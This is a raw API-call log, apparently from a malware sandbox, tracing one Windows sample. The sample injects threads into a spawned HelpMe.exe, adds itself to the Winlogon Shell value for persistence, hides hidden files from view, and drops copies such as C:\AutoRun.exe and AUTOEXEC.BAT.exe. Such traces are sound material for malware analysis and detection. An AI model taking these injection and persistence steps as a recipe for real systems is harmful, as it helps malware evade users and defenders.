"20190111212121.391","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryA","SUCCESS","0x77dd0000","lpFileName->advapi32.dll"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","process","CreateProcessInternalW","SUCCESS","1400","lpApplicationName->(null)","lpCommandLine->C:\WINDOWS\system32\HelpMe.exe"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","process","WinExec","SUCCESS","","lpCmdLine->C:\WINDOWS\system32\HelpMe.exe"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->268"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000a4","lpFileName->C:\DOCUME~1\JANETT~1\LOCALS~1\Temp\\MZ
","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->1400","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x000000a4","nNumberOfBytesToWrite->61440"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x000000a4","nNumberOfBytesToWrite->61440"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x000000a4","nNumberOfBytesToWrite->61440"
"20190111212121.401","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesToRead->61440"
"20190111212121.421","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000098","hKey->0x000000c0","lpSubKey->Software\Microsoft\Windows\CurrentVersion\ThemeManager"
"20190111212121.421","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x00000098","lpValueName->Compositing"
"20190111212121.421","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000098","hKey->0x000000c0","lpSubKey->Control Panel\Desktop"
"20190111212121.421","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x00000098","lpValueName->LameButtonText"
"20190111212121.421","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryA","SUCCESS","0x5ad70000","lpFileName->uxtheme.dll"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","process","CreateRemoteThread","SUCCESS","0x000000c0","lpStartAddress->0x00404008","th32ProcessID->1400","szExeFile->HelpMe.exe"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","process","CreateRemoteThread","SUCCESS","0x000000c4","lpStartAddress->0x00404008","th32ProcessID->1400","szExeFile->HelpMe.exe"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegCreateKeyExW","SUCCESS","0x000000d0","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SoftWare\Microsoft\Windows NT\CurrentVersion\Winlogon"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegSetValueExA","SUCCESS","","hKey->0x000000d0","lpValueName->Shell","dwType->1","lpData->Explorer.exe  HelpMe.exe","cbData->25"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegCreateKeyExW","SUCCESS","0x000000d4","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegSetValueExA","SUCCESS","","hKey->0x000000d4","lpValueName->CheckedValue","dwType->4","lpData->0","cbData->4"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegCreateKeyExW","SUCCESS","0x000000dc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000dc","lpValueName->Startup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegCreateKeyExW","SUCCESS","0x000000dc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegSetValueExW","SUCCESS","","hKey->0x000000dc","lpValueName->Startup","dwType->1","lpData->C:\Documents and Settings\janettedoe\Start Menu\Programs\Startup","cbData->130"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e0","lpValueName->NoNetHood"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e0","lpValueName->NoPropertiesMyComputer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e0","lpValueName->NoInternetIcon"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e0","lpValueName->NoCommonGroups"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e0","lpValueName->NoControlPanel"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000e0","lpValueName->NoSetFolders"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","SUCCESS","0x000000e2","hKey->HKEY_CLASSES_ROOT","lpSubKey->CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e2","lpValueName->(null)"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->SystemSetupInProgress"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\CurrentControlSet\Control\MiniNT"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->System\WPA\PnP"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->seed"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->OsLoaderPath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->OsLoaderPath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->SYSTEM\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->SystemPartition"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->SystemPartition"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->SourcePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->SourcePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->ServicePackSourcePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->ServicePackSourcePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->ServicePackCachePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->ServicePackCachePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->DriverCachePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->DriverCachePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000e8","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000e8","lpValueName->DevicePath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","synchronization","CreateMutexW","SUCCESS","0x000000e4","lpName->(null)"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","synchronization","CreateMutexW","SUCCESS","0x000000f0","lpName->(null)"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","synchronization","CreateMutexW","SUCCESS","0x000000f8","lpName->(null)"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Setup"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000fc","lpValueName->LogLevel"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x000000fc","lpValueName->LogLevel"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x000000fc","lpValueName->LogPath"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->0x000000fc","lpSubKey->AppLogLevels"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryA","SUCCESS","0x77920000","lpFileName->SETUPAPI.dll"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Rpc\PagedBuffers"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExA","SUCCESS","0x000000fc","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Rpc"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d\RpcThreadPoolThrottle"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Policies\Microsoft\Windows NT\Rpc"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryW","SUCCESS","0x77e70000","lpFileName->rpcrt4.dll"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000120","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000cc","lpFileName->C:\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","dwDesiredAccess->GENERIC_READ"
"20190111212126.389","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000128","nNumberOfBytesToWrite->20342"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->65536"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CopyFileExW","SUCCESS","","lpExistingFileName->C:\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpNewFileName->C:\AutoRun.exe"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000cc","lpFileName->C:\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->268"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000cc","lpFileName->C:\AUTOEXEC.BAT","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->268"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000cc","lpFileName->C:\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x0000012c","lpFileName->C:\AUTOEXEC.BAT","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000130","lpFileName->C:\AUTOEXEC.BAT.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x0000011c","lpFileName->\\.\PIPE\lsarpc","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000124","dwIoControlCode->0x004d0008","lpInBuffer->0x00000000","nInBufferSize->0x00000000","lpOutBuffer->0x0120f37c","nOutBufferSize->0x00000208","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000124","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
